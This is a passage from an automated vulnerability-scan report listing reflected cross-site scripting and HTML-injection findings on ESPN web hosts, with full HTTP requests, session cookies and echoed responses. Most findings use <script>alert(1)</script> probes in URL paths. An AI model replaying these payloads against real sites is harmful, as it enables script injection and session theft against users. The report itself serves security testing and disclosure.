HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:33:55 GMT Content-Length: 82242 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>United States Footb ...[SNIP]... <a href="/worldcup2010/team?team=660&3e57e"><a>f7a6114e7ef=1&_slug_=united-states&3e57e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70663"><a>50054d97128 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia70663"><a>50054d97128 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:19 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:19 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:33:19 GMT Content-Length: 81915 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&_slug_=serbia70663"><a>50054d97128&topId=797998&linktext=Serbia+coach+Radomir+Antic+wants+to+stay"> ...[SNIP]...
2.112. http://soccernet.espn.go.com/worldcup2010/team/_/team/6757/serbia [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/6757/serbia
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82ccb"><a>dea0025a04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/6757/serbia?82ccb"><a>dea0025a04=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:06 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN19 Cache-Expires: Sat, 06 Nov 2010 23:31:06 GMT Content-Length: 82015 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Serbia Football / S ...[SNIP]... <a href="/worldcup2010/team?team=6757&82ccb"><a>dea0025a04=1&_slug_=serbia&82ccb"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cab3f<script>alert(1)</script>2f1f80457b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /keyword/searchcab3f<script>alert(1)</script>2f1f80457b3 HTTP/1.1 Host: sports.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A1%2C%22to%22%3A3%2C%22c%22%3A%22http%3A%2F%2Fsports.espn.go.com%2Fmlb%2Fnews%2Fstory%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A1%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289019231610; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; CRBLM_LAST_UPDATE=1289019281; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020213231%7C1383628213231%3B%20s_c24_s%3DFirst%2520Visit%7C1289022013231%3B%20s_gpv_pn%3Dsoccernet%253Afrontpage%253Afrontpage%7C1289022013456%3B; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; AcceptCookies=yes; CRBLM=CBLM-001:; COREG=5901; SWID=40C651A1-56EE-4BD7-BAD0-16B429463C17;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 136 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 X-UA-Compatible: IE=EmulateIE7
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/keyword/searchcab3f<script>alert(1)</script>2f1f80457b3</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ceec<script>alert(1)</script>05c8d5071b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntry2ceec<script>alert(1)</script>05c8d5071b9</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 101c7<script>alert(1)</script>0c34eaeab34 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en101c7<script>alert(1)</script>0c34eaeab34/ HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 128 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en101c7<script>alert(1)</script>0c34eaeab34/</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ebfd3<script>alert(1)</script>d621151af8a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /enebfd3<script>alert(1)</script>d621151af8a/conversation HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 140 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/enebfd3<script>alert(1)</script>d621151af8a/conversation</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6338<script>alert(1)</script>735d75941d4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/conversationc6338<script>alert(1)</script>735d75941d4 HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 137 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/conversationc6338<script>alert(1)</script>735d75941d4</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 71549<script>alert(1)</script>907b7ff7526 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response (redirected)
HTTP/1.1 404 Not Found Connection: close Content-Length: 147 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/en71549<script>alert(1)</script>907b7ff7526/createOrUpdateEntry</BODY></HTML>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a058b<script>alert(1)</script>6b3ce37571f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A5CA5050108F8-60000103A00026F2[CE]; espnAffiliate=invalid; CRBLM=CBLM-001:; SWID=EA8944C6-BBF0-4547-91B6-3EA6AF834987; SEEN2=JxMLA9EOJxMLA9EO:;
Response
HTTP/1.1 404 Not Found Connection: close Content-Length: 144 Content-Type: text/html; charset=iso-8859-1 Server: barista/3.3.6 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRoBUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY>404 Not Found<HR>/en/createOrUpdateEntrya058b<script>alert(1)</script>6b3ce37571f</BODY></HTML>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67f2a<script>alert(1)</script>2fd0abe5ee5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en67f2a<script>alert(1)</script>2fd0abe5ee5/entry HTTP/1.1 Host: streak.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289009464375_547728%22%2C%22pv%22%3A10%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fespn.go.com%2Fcollege-football%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A12%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289009484661%7D; jt_time=1289009672046; s_sess=%20s_ppv%3D99%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_v3%3D2009_STREAK_PAGE1%3B%20s_sq%3D%3B; fsr.a=1289009493820; DETECT=1.0.0&90557&15933611&1&1; ESPN360beta=betaSet; CRBLM_LAST_UPDATE=1289009493; lang=en; userAB=7; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289009672001%7C1383617672001%3B%20s_c24_s%3DFirst%2520Visit%7C1289011472001%3B%20s_gpv_pn%3Dfantasy%253Astreak%253Astreak%253Aentry%253Aentrynotloggedin%7C1289011472014%3B; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; 